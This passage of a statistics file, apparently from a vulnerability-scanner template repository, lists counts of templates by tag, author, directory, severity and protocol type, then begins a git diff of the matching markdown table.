","count":1},{"name":"gateone","count":1},{"name":"expose","count":1},{"name":"tbk","count":1},{"name":"virustotal","count":1},{"name":"free5gc","count":1},{"name":"bravenewcoin","count":1},{"name":"hanming","count":1},{"name":"microcomputers","count":1},{"name":"webmodule-ee","count":1},{"name":"placeos","count":1},{"name":"purestorage","count":1},{"name":"arris","count":1},{"name":"nagios-xi","count":1},{"name":"visionhub","count":1},{"name":"pyramid","count":1},{"name":"iplanet","count":1},{"name":"extreme","count":1},{"name":"panwei","count":1},{"name":"mysqld","count":1},{"name":"geutebruck","count":1},{"name":"juniper","count":1},{"name":"oauth2","count":1},{"name":"apigee","count":1},{"name":"tox","count":1},{"name":"pricing-deals-for-woocommerce","count":1},{"name":"iterable","count":1},{"name":"kerio","count":1},{"name":"opennms","count":1},{"name":"hcl","count":1},{"name":"yaws","count":1},{"name":"bibliosoft","count":1},{"name":"snipeit","count":1},{"name":"prismaweb","count":1},{"name":"learnpress","count":1},{"name":"gallery","count":1},{"name":"interlib","count":1},{"name":"credential","count":1},{"name":"csa","count":1},{"name":"visualtools","count":1},{"name":"mappress","count":1},{"name":"ipfind","count":1},{"name":"tjws","count":1},{"name":"login-bypass","count":1},{"name":"karel","count":1},{"name":"sureline","count":1},{"name":"oneblog","count":1},{"name":"sage","count":1},{"name":"myucms","count":1},{"name":"burp","count":1},{"name":"huemagic","count":1},{"name":"doh","count":1},{"name":"buildbot","count":1},{"name":"threatq","count":1},{"name":"ntop","count":1},{"name":"wmt","count":1},{"name":"adoptapet","count":1},{"name":"darktrace","count":1},{"name":"oos","count":1},{"name":"clockwatch","count":1},{"name":"workspace","count":1},{"name":"piano","count":1},{"name":"directions","count":1},{"name":"playable","count":1},{"name":"wix","count":1},{"name":"clink-office","count":1},{"name":"onelogin","count":1},{"name":"adminset","count":1},{"name":"secmail","count":1},{"name":"thecatapi","count":1},{"name":"sofneta","count":1},{"name":"nifi","count":1},{"name":"hugo","count":1},{"name":"natemail","count":1},{"name":"web3storage","count":1},{"name":"launchdarkly","count":1},{"name":"jvm","count":1},{"name":"metform","count":1},{"name":"currencyfreaks","count":1},{"name":"citybook","count":1},{"name":"gnuboard5","count":1},{"name":"uberflip","count":1},{"name":"pane","count":1},{"name":"themefusion","count":1},{"name":"ssi","count":1},{"name":"flickr","count":1},{"name":"nj2000","count":1},{"name":"cloudrun","count":1},{"name":"webcenter","count":1},{"name":"fusion","count":1},{"name":"scrapingant","count":1},{"name":"sicom","count":1},{"name":"short.io","count":1},{"name":"connect","count":1},{"name":"management","count":1},{"name":"blockfrost","count":1},{"name":"acontent","count":1},{"name":"mtheme","count":1},{"name":"zap","count":1},{"name":"commerce","count":1},{"name":"kerbynet","count":1},{"name":"calendarific","count":1},{"name":"nvrmini","count":1},{"name":"homeworks","count":1},{"name":"cloudconvert","count":1},{"name":"aveva","count":1},{"name":"travis","count":1},{"name":"mi","count":1},{"name":"cuteeditor","count":1},{"name":"tink","count":1},{"name":"hypertest","count":1},{"name":"buddy","count":1},{"name":"javafaces","count":1},{"name":"cdi","count":1},{"name":"pollbot","count":1},{"name":"h3c-imc","count":1},{"name":"master","count":1},{"name":"icc-pro","count":1},{"name":"machproweb","count":1},{"name":"jabber","count":1},{"name":"dasan","count":1},{"name":"securityspy","count":1},{"name":"upnp","count":1},{"name":"bonita","count":1},{"name":"php-fusion","count":1},{"name":"viaware","count":1},{"name":"ticketmaster","count":1},{"name":"d-link","count":1},{"name":"backpack","count":1},{"name":"aceadmin","count":1},{"name":"musicstore","count":1},{"name":"ccm","count":1},{"name":"workresources","count":1},{"name":"bazarr","count":1},{"name":"razer","count":1},{"name":"phpsec","count":1},{"name":"timesheet","count":1},{"name":"jumpcloud","count":1},{"name":"browserless","count":1},{"name":"zipkin","count":1},{"name":"bible","count":1},{"name":"netic","count":1},{"name":"mcloud","count":1},{"name":"tpshop","count":1},{"name":"zenario","count":1},{"name":"hostio","count":1},{"name":"coinmarketcap","count":1},{"name":"davantis","count":1},{"name":"trilithic","count":1},{"name":"envoy","count":1},{"name":"loancms","count":1},{"name":"anycomment","count":1},{"name":"contentify","count":1},{"name":"sonarcloud","count":1},{"name":"stytch","count":1},{"name":"webeditors","count":1},{"name":"intelx","count":1},{"name":"logger1000","count":1},{"name":"gemfury","count":1},{"name":"ddownload","count":1},{"name":"3com","count":1},{"name":"formcraft3","count":1},{"name":"server","count":1},{"name":"vision","count":1},{"name":"bscw","count":1},{"name":"ipanel","count":1},{"name":"pulsesecure","count":1},{"name":"geocode","count":1},{"name":"bedita","count":1},{"name":"nessus","count":1},{"name":"moinmoin","count":1},{"name":"rainloop","count":1},{"name":"liberty","count":1},{"name":"front","count":1},{"name":"phoronix","count":1},{"name":"satellian","count":1},{"name":"rwebserver","count":1},{"name":"manager","count":1},{"name":"drone","count":1},{"name":"vault","count":1},{"name":"leanix","count":1},{"name":"tembosocial","count":1},{"name":"qsan","count":1},{"name":"patreon","count":1},{"name":"wordcloud","count":1},{"name":"zebra","count":1},{"name":"quantum","count":1},{"name":"mariadb","count":1},{"name":"particle","count":1},{"name":"bullwark","count":1},{"name":"thinkserver","count":1},{"name":"aspnuke","count":1},{"name":"oliver","count":1},{"name":"soar","count":1},{"name":"debian","count":1},{"name":"chronoforums","count":1},{"name":"mirasys","count":1},{"name":"dnn","count":1},{"name":"starttls","count":1},{"name":"blackduck","count":1},{"name":"cooperhewitt","count":1},{"name":"weglot","count":1},{"name":"tieline","count":1},{"name":"workerman","count":1},{"name":"dotnetcms","count":1},{"name":"b2evolution","count":1},{"name":"kvm","count":1},{"name":"axiom","count":1},{"name":"event","count":1},{"name":"creatio","count":1},{"name":"sogo","count":1},{"name":"xiuno","count":1},{"name":"ns","count":1},{"name":"cve1028","count":1},{"name":"binaryedge","count":1},{"name":"etherscan","count":1},{"name":"amt","count":1},{"name":"aims","count":1},{"name":"raspberry","count":1},{"name":"turnkey","count":1},{"name":"csod","count":1},{"name":"craftmypdf","count":1},{"name":"privatekey","count":1},{"name":"axxonsoft","count":1},{"name":"openedx","count":1},{"name":"acexy","count":1},{"name":"wpcentral","count":1},{"name":"serverstatus","count":1},{"name":"simply-schedule-appointments","count":1},{"name":"opennebula","count":1},{"name":"ganglia","count":1},{"name":"franklinfueling","count":1},{"name":"tarantella","count":1},{"name":"lychee","count":1},{"name":"sucuri","count":1},{"name":"jinher","count":1},{"name":"web-suite","count":1},{"name":"gira","count":1},{"name":"acs","count":1},{"name":"pinata","count":1},{"name":"stackstorm","count":1},{"name":"webui","count":1},{"name":"yopass","count":1},{"name":"looker","count":1},{"name":"feifeicms","count":1},{"name":"onlinefarm","count":1},{"name":"istat","count":1},{"name":"twitter-server","count":1},{"name":"apiman","count":1},{"name":"vtiger","count":1},{"name":"twig","count":1},{"name":"cuppa","count":1},{"name":"intel","count":1},{"name":"rijksmuseum","count":1},{"name":"youtube","count":1},{"name":"piwik","count":1},{"name":"backupbuddy","count":1},{"name":"semaphore","count":1},{"name":"openx","count":1},{"name":"jmeter","count":1},{"name":"debounce","count":1},{"name":"simpleclientmanagement","count":1},{"name":"acsoft","count":1},{"name":"flip","count":1},{"name":"gpc","count":1},{"name":"zenphoto","count":1},{"name":"glowroot","count":1},{"name":"siemens","count":1},{"name":"zendframework","count":1},{"name":"osquery","count":1},{"name":"asanhamayesh","count":1},{"name":"sumowebtools","count":1},{"name":"ebird","count":1},{"name":"jspxcms","count":1},{"name":"yarn","count":1},{"name":"sso","count":1},{"name":"phpwiki","count":1},{"name":"realteo","count":1},{"name":"mara","count":1},{"name":"sms","count":1},{"name":"luftguitar","count":1},{"name":"bitdefender","count":1},{"name":"phpunit","count":1},{"name":"huijietong","count":1},{"name":"n-central","count":1},{"name":"jreport","count":1},{"name":"zaver","count":1},{"name":"html2wp","count":1},{"name":"simplecrm","count":1},{"name":"yealink","count":1},{"name":"serpstack","count":1},{"name":"peoplesoft","count":1},{"name":"deluge","count":1},{"name":"chuangtian","count":1},{"name":"moonpay","count":1},{"name":"paytm","count":1},{"name":"idemia","count":1},{"name":"rdp","count":1},{"name":"rujjie","count":1},{"name":"wordnik","count":1},{"name":"proxykingdom","count":1},{"name":"block","count":1},{"name":"lgate","count":1},{"name":"phpldap","count":1},{"name":"fudforum","count":1},{"name":"auxin-elements","count":1},{"name":"flyteconsole","count":1},{"name":"postmark","count":1},{"name":"scanii","count":1},{"name":"nsicg","count":1},{"name":"emc","count":1},{"name":"codis","count":1},{"name":"dribbble","count":1},{"name":"bottle","count":1},{"name":"tekton","count":1},{"name":"mag","count":1},{"name":"asa","count":1},{"name":"gsoap","count":1},{"name":"scrapestack","count":1},{"name":"giphy","count":1},{"name":"google-earth","count":1},{"name":"cloudfoundry","count":1},{"name":"phabricator","count":1},{"name":"aerocms","count":1},{"name":"openv500","count":1},{"name":"shopizer","count":1},{"name":"e2pdf","count":1},{"name":"suprema","count":1},{"name":"jsmol2wp","count":1},{"name":"flahscookie","count":1},{"name":"synnefo","count":1},{"name":"file-upload","count":1},{"name":"smtp2go","count":1},{"name":"awin","count":1},{"name":"cmsimple","count":1},{"name":"netmask","count":1},{"name":"okta","count":1},{"name":"noescape","count":1},{"name":"juddi","count":1},{"name":"wing-ftp","count":1},{"name":"datadog","count":1},{"name":"rpcms","count":1},{"name":"usc-e-shop","count":1},{"name":"easy-student-results","count":1},{"name":"alchemy","count":1},{"name":"directadmin","count":1},{"name":"discord","count":1},{"name":"nsasg","count":1},{"name":"esxi","count":1},{"name":"pagecdn","count":1},{"name":"maccmsv10","count":1},{"name":"cloudron","count":1},{"name":"qvisdvr","count":1},{"name":"pivotaltracker","count":1},{"name":"triconsole","count":1},{"name":"nexusdb","count":1},{"name":"sslmate","count":1},{"name":"proxycrawl","count":1},{"name":"fastapi","count":1},{"name":"woody","count":1},{"name":"smuggling","count":1},{"name":"pirelli","count":1},{"name":"bing","count":1},{"name":"pdflayer","count":1},{"name":"nerdgraph","count":1},{"name":"routeros","count":1},{"name":"opengear","count":1},{"name":"ubiquiti","count":1},{"name":"fastpanel","count":1},{"name":"altn","count":1},{"name":"3dprint","count":1},{"name":"asgaros-forum","count":1},{"name":"sourcebans","count":1},{"name":"icecast","count":1}],"authors":[{"name":"dhiyaneshdk","count":707},{"name":"daffainfo","count":662},{"name":"pikpikcu","count":344},{"name":"pdteam","count":273},{"name":"geeknik","count":220},{"name":"ricardomaia","count":210},{"name":"pussycat0x","count":181},{"name":"0x_akoko","count":171},{"name":"dwisiswant0","count":171},{"name":"ritikchaddha","count":167},{"name":"princechaddha","count":154},{"name":"gy741","count":137},{"name":"arafatansari","count":112},{"name":"tess","count":86},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":62},{"name":"akincibor","count":55},{"name":"theamanrawat","count":51},{"name":"for3stco1d","count":50},{"name":"gaurang","count":42},{"name":"philippedelteil","count":39},{"name":"edoardottt","count":36},{"name":"c-sh0","count":34},{"name":"righettod","count":33},{"name":"adam crosser","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"hardik-solanki","count":23},{"name":"ffffffff0x","count":22},{"name":"techbrunchfr","count":21},{"name":"cckuailong","count":18},{"name":"sullo","count":17},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"johnk3r","count":14},{"name":"sharath","count":13},{"name":"random-robbie","count":13},{"name":"0ri2n","count":13},{"name":"tenbird","count":13},{"name":"melbadry9","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"elsfa7110","count":11},{"name":"dogasantos","count":11},{"name":"nadino","count":10},{"name":"meme-lord","count":10},{"name":"alph4byt3","count":10},{"name":"hackergautam","count":10},{"name":"random_robbie","count":10},{"name":"logicalhunter","count":10},{"name":"emadshanab","count":9},{"name":"0x240x23elu","count":9},{"name":"oppsec","count":9},{"name":"veshraj","count":8},{"name":"iamthefrogy","count":8},{"name":"lu4nx","count":8},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"harshbothra_","count":7},{"name":"caspergn","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"divya_mudgal","count":7},{"name":"kophjager007","count":7},{"name":"amit-jd","count":7},{"name":"its0x08","count":7},{"name":"techryptic (@tech)","count":7},{"name":"leovalcante","count":7},{"name":"theabhinavgaur","count":7},{"name":"_0xf4n9x_","count":7},{"name":"rootxharsh","count":6},{"name":"evan rubinstein","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"pathtaga","count":6},{"name":"nullfuzz","count":6},{"name":"imnightmaree","count":6},{"name":"gitlab red team","count":6},{"name":"__fazal","count":6},{"name":"iamnoooob","count":6},{"name":"puzzlepeaches","count":6},{"name":"forgedhallpass","count":6},{"name":"pentest_swissky","count":6},{"name":"xelkomy","count":5},{"name":"yanyun","count":5},{"name":"0xlittleboy","count":5},{"name":"clem9669","count":5},{"name":"joanbono","count":5},{"name":"prajiteshsingh","count":5},{"name":"panch0r3d","count":5},{"name":"podalirius","count":5},{"name":"robotshell","count":5},{"name":"nodauf","count":5},{"name":"ganofins","count":5},{"name":"dadevel","count":4},{"name":"3th1c_yuk1","count":4},{"name":"s0obi","count":4},{"name":"dolev farhi","count":4},{"name":"powerexploit","count":4},{"name":"defr0ggy","count":4},{"name":"tanq16","count":4},{"name":"h1ei1","count":4},{"name":"shine","count":4},{"name":"wisnupramoedya","count":4},{"name":"scent2d","count":4},{"name":"e_schultze_","count":4},{"name":"incogbyte","count":4},{"name":"r3naissance","count":4},{"name":"emenalf","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"mr-xn","count":3},{"name":"thomas_from_offensity","count":3},{"name":"skeltavik","count":3},{"name":"supras","count":3},{"name":"lark-lab","count":3},{"name":"johnjhacking","count":3},{"name":"z3bd","count":3},{"name":"arcc","count":3},{"name":"ambassify","count":3},{"name":"_generic_human_","count":3},{"name":"ekrause","count":3},{"name":"f1tz","count":3},{"name":"whoever","count":3},{"name":"kh4sh3i","count":3},{"name":"mavericknerd","count":3},{"name":"hahwul","count":3},{"name":"sushantkamble","count":3},{"name":"andydoering","count":3},{"name":"jarijaas","count":3},{"name":"me9187","count":3},{"name":"0w4ys","count":3},{"name":"impramodsargar","count":3},{"name":"davidmckennirey","count":3},{"name":"ph33r","count":3},{"name":"binaryfigments","count":3},{"name":"fyoorer","count":3},{"name":"atomiczsec","count":3},{"name":"dudez","count":3},{"name":"unstabl3","count":3},{"name":"swissky","count":3},{"name":"huowuzhao","count":3},{"name":"fxploit","count":3},{"name":"dr0pd34d","count":3},{"name":"shifacyclewala","count":3},{"name":"alifathi-h1","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"splint3r7","count":3},{"name":"evergreencartoons","count":3},{"name":"lucasljm2001","count":3},{"name":"moritz nentwig","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"gevakun","count":2},{"name":"parth","count":2},{"name":"taielab","count":2},{"name":"koti2","count":2},{"name":"socketz","count":2},{"name":"martincodes-de","count":2},{"name":"0xcrypto","count":2},{"name":"dbrwsky","count":2},{"name":"g4l1t0","count":2},{"name":"uomogrande","count":2},{"name":"z0ne","count":2},{"name":"bsysop","count":2},{"name":"rafaelwdornelas","count":2},{"name":"bing0o","count":2},{"name":"joeldeleep","count":2},{"name":"korteke","count":2},{"name":"ree4pwn","count":2},{"name":"foulenzer","count":2},{"name":"thezakman","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"udit_thakkur","count":2},{"name":"paradessia","count":2},{"name":"vsh00t","count":2},{"name":"0xnirvana","count":2},{"name":"nvn1729","count":2},{"name":"kishore-hariram","count":2},{"name":"cocxanh","count":2},{"name":"afaq","count":2},{"name":"amsda","count":2},{"name":"sinkettu","count":2},{"name":"gal nagli","count":2},{"name":"ehsahil","count":2},{"name":"thardt-praetorian","count":2},{"name":"shelled","count":2},{"name":"danielmofer","count":2},{"name":"hackerarpan","count":2},{"name":"r12w4n","count":2},{"name":"wa1tf0rme","count":2},{"name":"vavkamil","count":2},{"name":"megamansec","count":2},{"name":"lotusdll","count":2},{"name":"github.com/its0x08","count":2},{"name":"pxmme1337","count":2},{"name":"true13","count":2},{"name":"kiblyn11","count":2},{"name":"0xrudra","count":2},{"name":"geekby","count":2},{"name":"ajaysenr","count":2},{"name":"joshlarsen","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"raesene","count":2},{"name":"cckuakilong","count":2},{"name":"notnotnotveg","count":2},{"name":"randomrobbie","count":2},{"name":"666asd","count":2},{"name":"redteambrasil","count":2},{"name":"hetroublemakr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"8arthur","count":2},{"name":"canberbamber","count":2},{"name":"bananabr","count":2},{"name":"x1m_martijn","count":2},{"name":"clarkvoss","count":2},{"name":"nuk3s3c","count":2},{"name":"n-thumann","count":2},{"name":"sy3omda","count":2},{"name":"nkxxkn","count":2},{"name":"sbani","count":2},{"name":"0xprial","count":2},{"name":"v0idc0de","count":2},{"name":"mohammedsaneem","count":2},{"name":"k11h-de","count":2},{"name":"badboycxcc","count":2},{"name":"convisoappsec","count":2},{"name":"kre80r","count":2},{"name":"y4er","count":2},{"name":"myztique","count":2},{"name":"codexlynx","count":2},{"name":"dahse89","count":2},{"name":"0xsapra","count":2},{"name":"smaranchand","count":2},{"name":"c3l3si4n","count":2},{"name":"nybble04","count":2},{"name":"paperpen","count":2},{"name":"0xelkomy","count":2},{"name":"manas_harsh","count":2},{"name":"luci","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"d4vy","count":2},{"name":"brenocss","count":2},{"name":"bernardofsr","count":2},{"name":"fabaff","count":2},{"name":"bp0lr","count":2},{"name":"0xsmiley","count":2},{"name":"w4cky_","count":2},{"name":"opencirt","count":1},{"name":"jonathanwalker","count":1},{"name":"pjborah","count":1},{"name":"kr1shna4garwal","count":1},{"name":"deena","count":1},{"name":"nielsing","count":1},{"name":"miryangjung","count":1},{"name":"ola456","count":1},{"name":"lixts","count":1},{"name":"carlosvieira","count":1},{"name":"zinminphy0","count":1},{"name":"stupidfish","count":1},{"name":"co0nan","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"anon-artist","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"houdinis","count":1},{"name":"ofjaaah","count":1},{"name":"daviey","count":1},{"name":"realexp3rt","count":1},{"name":"aresx","count":1},{"name":"caon","count":1},{"name":"elder tao","count":1},{"name":"ggranjus","count":1},{"name":"allenwest24","count":1},{"name":"push4d","count":1},{"name":"borna nematzadeh","count":1},{"name":"alexrydzak","count":1},{"name":"shelld3v","count":1},{"name":"dawid-czarnecki","count":1},{"name":"mesaglio","count":1},{"name":"juicypotato1","count":1},{"name":"jcockhren","count":1},{"name":"dievus","count":1},{"name":"th3.d1p4k","count":1},{"name":"zhenwarx","count":1},{"name":"alex","count":1},{"name":"kagamigawa","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"gboddin","count":1},{"name":"f1she3","count":1},{"name":"jeya seelan","count":1},{"name":"arall","count":1},{"name":"ahmetpergamum","count":1},{"name":"mihhailsokolov","count":1},{"name":"tehtbl","count":1},{"name":"dale clarke","count":1},{"name":"nobody","count":1},{"name":"spac3wh1te","count":1},{"name":"evolutionsec","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"schniggie","count":1},{"name":"blckraven","count":1},{"name":"1nf1n7y","count":1},{"name":"nagli","count":1},{"name":"petruknisme","count":1},{"name":"furkansenan","count":1},{"name":"ahmed sherif","count":1},{"name":"mrcl0wnlab","count":1},{"name":"ipanda","count":1},{"name":"luqmaan hadia","count":1},{"name":"jiheon-dev","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"clment cruchet","count":1},{"name":"dali","count":1},{"name":"pry0cc","count":1},{"name":"affix","count":1},{"name":"0xceeb","count":1},{"name":"x6263","count":1},{"name":"thevillagehacker","count":1},{"name":"ph33rr","count":1},{"name":"0xceba","count":1},{"name":"makyotox","count":1},{"name":"jbertman","count":1},{"name":"nytr0gen","count":1},{"name":"8authur","count":1},{"name":"apt-mirror","count":1},{"name":"jrolf","count":1},{"name":"kiks7","count":1},{"name":"_c0wb0y_","count":1},{"name":"j33n1k4","count":1},{"name":"jna1","count":1},{"name":"shivampand3y","count":1},{"name":"compr00t","count":1},{"name":"hakimkt","count":1},{"name":"open-sec","count":1},{"name":"b0yd","count":1},{"name":"oscarintherocks","count":1},{"name":"viniciuspereiras","count":1},{"name":"aaronchen0","count":1},{"name":"rodnt","count":1},{"name":"kaizensecurity","count":1},{"name":"fopina","count":1},{"name":"vzamanillo","count":1},{"name":"skylark-lab","count":1},{"name":"elouhi","count":1},{"name":"duty_1g","count":1},{"name":"coldfish","count":1},{"name":"undefl0w","count":1},{"name":"patralos","count":1},{"name":"0xrod","count":1},{"name":"tim_koopmans","count":1},{"name":"0xteles","count":1},{"name":"sickwell","count":1},{"name":"noobexploiter","count":1},{"name":"lrtk-coder","count":1},{"name":"nerrorsec","count":1},{"name":"manuelbua","count":1},{"name":"zsusac","count":1},{"name":"2rs3c","count":1},{"name":"majidmc2","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"notsoevilweasel","count":1},{"name":"ooooooo_q","count":1},{"name":"kailashbohara","count":1},{"name":"secthebit","count":1},{"name":"y0no","count":1},{"name":"udinchan","count":1},{"name":"couskito","count":1},{"name":"alevsk","count":1},{"name":"ransomsec","count":1},{"name":"regala_","count":1},{"name":"jeya.seelan","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"thelicato","count":1},{"name":"marcos_iaf","count":1},{"name":"bad5ect0r","count":1},{"name":"failopen","count":1},{"name":"philippdelteil","count":1},{"name":"intx0x80","count":1},{"name":"th3r4id","count":1},{"name":"yashanand155","count":1},{"name":"exid","count":1},{"name":"0xd0ff9","count":1},{"name":"francescocarlucci","count":1},{"name":"pdp","count":1},{"name":"udyz","count":1},{"name":"berkdusunur","count":1},{"name":"b0rn2r00t","count":1},{"name":"luskabol","count":1},{"name":"lark lab","count":1},{"name":"hakluke","count":1},{"name":"revblock","count":1},{"name":"ndmalc","count":1},{"name":"osamahamad","count":1},{"name":"ringo","count":1},{"name":"ayadi","count":1},{"name":"lingtren","count":1},{"name":"arjunchandarana","count":1},{"name":"momen eldawakhly","count":1},{"name":"cookiehanhoan","count":1},{"name":"wabafet","count":1},{"name":"remonsec","count":1},{"name":"sak1","count":1},{"name":"queencitycyber","count":1},{"name":"piyushchhiroliya","count":1},{"name":"bughuntersurya","count":1},{"name":"pascalheidmann","count":1},{"name":"iampritam","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"imhunterand","count":1},{"name":"aringo","count":1},{"name":"liquidsec","count":1},{"name":"hexcat","count":1},{"name":"willd96","count":1},{"name":"shockwave","count":1},{"name":"ramkrishna sawant","count":1},{"name":"xeldax","count":1},{"name":"mantissts","count":1},{"name":"kurohost","count":1},{"name":"0h1in9e","count":1},{"name":"noraj","count":1},{"name":"kabirsuda","count":1},{"name":"hardik-rathod","count":1},{"name":"justmumu","count":1},{"name":"pratik khalane","count":1},{"name":"narluin","count":1},{"name":"ahmed abou-ela","count":1},{"name":"amanrawat","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dk999","count":1},{"name":"fq_hsu","count":1},{"name":"akshansh","count":1},{"name":"soyelmago","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"rschio","count":1},{"name":"pudsec","count":1},{"name":"bartu utku sarp","count":1},{"name":"droberson","count":1},{"name":"tirtha_mandal","count":1},{"name":"absshax","count":1},{"name":"yashgoti","count":1},{"name":"charanrayudu","count":1},{"name":"akash.c","count":1},{"name":"flag007","count":1},{"name":"shiar","count":1},{"name":"s1r1u5_","count":1},{"name":"streetofhackerr007","count":1},{"name":"qlkwej","count":1},{"name":"b4uh0lz","count":1},{"name":"0ut0fb4nd","count":1},{"name":"daffianfo","count":1},{"name":"jteles","count":1},{"name":"retr02332","count":1},{"name":"brabbit10","count":1},{"name":"zandros0","count":1},{"name":"mukundbhuva","count":1},{"name":"p-l-","count":1},{"name":"tea","count":1},{"name":"ling","count":1},{"name":"sshell","count":1},{"name":"xshuden","count":1},{"name":"viondexd","count":1},{"name":"fmunozs","count":1},{"name":"un-fmunozs","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"jas37","count":1},{"name":"vinit989","count":1},{"name":"w0tx","count":1},{"name":"davidfegyver","count":1},{"name":"infosecsanyam","count":1},{"name":"noamrathaus","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"chron0x","count":1},{"name":"af001","count":1},{"name":"elmahdi","count":1},{"name":"mubassirpatel","count":1},{"name":"becivells","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"unkl4b","count":1},{"name":"exceed","count":1},{"name":"alperenkesk","count":1},{"name":"_harleo","count":1},{"name":"andysvints","count":1},{"name":"exploitation","count":1},{"name":"_darrenmartyn","count":1},{"name":"knassar702","count":1},{"name":"kareemse1im","count":1},{"name":"0xh7ml","count":1},{"name":"amnotacat","count":1},{"name":"erethon","count":1},{"name":"bjhulst","count":1},{"name":"sec_hawk","count":1},{"name":"d0rkerdevil","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"jaimin gondaliya","count":1},{"name":"omarkurt","count":1},{"name":"toufik-airane","count":1},{"name":"sicksec","count":1},{"name":"rotemreiss","count":1},{"name":"shifacyclewla","count":1},{"name":"h4kux","count":1},{"name":"geraldino2","count":1},{"name":"elitebaz","count":1},{"name":"iphantasmic","count":1},{"name":"0xtavian","count":1},{"name":"miroslavsotak","count":1},{"name":"harshinsecurity","count":1},{"name":"retr0","count":1},{"name":"manasmbellani","count":1},{"name":"djoevanka","count":1},{"name":"izn0u","count":1},{"name":"kiransau","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"florianmaak","count":1},{"name":"ohlinge","count":1},{"name":"mah3sec_","count":1},{"name":"httpvoid","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"maximus decimus","count":1},{"name":"rivalsec","count":1},{"name":"mass0ma","count":1},{"name":"mhdsamx","count":1},{"name":"ptonewreckin","count":1},{"name":"arr0way","count":1},{"name":"igibanez","count":1},{"name":"luqman","count":1},{"name":"lethargynavigator","count":1},{"name":"rubina119","count":1},{"name":"aayush vishnoi","count":1},{"name":"phyr3wall","count":1},{"name":"lamscun","count":1},{"name":"xstp","count":1},{"name":"micha3lb3n","count":1},{"name":"yavolo","count":1},{"name":"sherlocksecurity","count":1},{"name":"husain","count":1},{"name":"sleepingbag945","count":1},{"name":"ldionmarcil","count":1},{"name":"andirrahmani1","count":1},{"name":"natto97","count":1},{"name":"rojanrijal","count":1},{"name":"evan rubinstien","count":1},{"name":"whynotke","count":1},{"name":"breno_css","count":1},{"name":"paper-pen","count":1},{"name":"arm!tage","count":1},{"name":"dhiyaneshdki","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"ilovebinbash","count":1},{"name":"prettyboyaaditya","count":1},{"name":"jaskaran","count":1},{"name":"yuansec","count":1},{"name":"adrianmf","count":1},{"name":"tirtha","count":1},{"name":"jbaines-r7","count":1},{"name":"furkansayim","count":1},{"name":"thebinitghimire","count":1},{"name":"act1on3","count":1},{"name":"shreyapohekar","count":1},{"name":"5up3r541y4n","count":1},{"name":"orpheus","count":1},{"name":"rotembar","count":1},{"name":"screamy","count":1},{"name":"hanlaomo","count":1},{"name":"ok_bye_now","count":1},{"name":"bywalks","count":1},{"name":"wlayzz","count":1},{"name":"calumjelrick","count":1},{"name":"official_blackhat13","count":1},{"name":"danigoland","count":1}],"directory":[{"name":"cves","count":1552},{"name":"exposed-panels","count":805},{"name":"technologies","count":529},{"name":"vulnerabilities","count":528},{"name":"misconfiguration","count":371},{"name":"exposures","count":325},{"name":"token-spray","count":237},{"name":"workflows","count":190},{"name":"default-logins","count":122},{"name":"file","count":78},{"name":"network","count":70},{"name":"takeovers","count":68},{"name":"iot","count":45},{"name":"miscellaneous","count":27},{"name":"cnvd","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1919},{"name":"high","count":1169},{"name":"medium","count":849},{"name":"critical","count":568},{"name":"low","count":294},{"name":"unknown","count":26}],"types":[{"name":"http","count":4630},{"name":"network","count":84},{"name":"file","count":78},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index d63849fa39..1bc47cd208 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,2282 +1,2353 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|----------------------------------|-------|-------------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 | -| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 | -| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 | -| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 | -| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | | -| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | | -| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | | -| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | 